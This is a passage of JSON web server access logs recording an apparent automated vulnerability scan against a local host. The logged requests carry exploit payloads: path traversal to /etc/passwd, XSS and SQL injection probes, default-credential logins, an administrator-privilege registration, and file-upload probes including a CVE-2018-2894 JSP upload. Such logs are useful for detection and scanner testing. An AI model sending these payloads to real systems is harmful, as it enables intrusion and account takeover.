HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.014","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A29N5m5UPiSYAM4Gm40pW3EBqCnH\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A29N5mALmWpgoSO9ei2mAlayGl4m\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x2229N5mALmWpgoSO9ei2mAlayGl4m.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"log=29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com&pwd=29N5m5UPiSYAM4Gm40pW3EBqCnH@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/backend/auth/signin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /backend/backend/auth/signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", 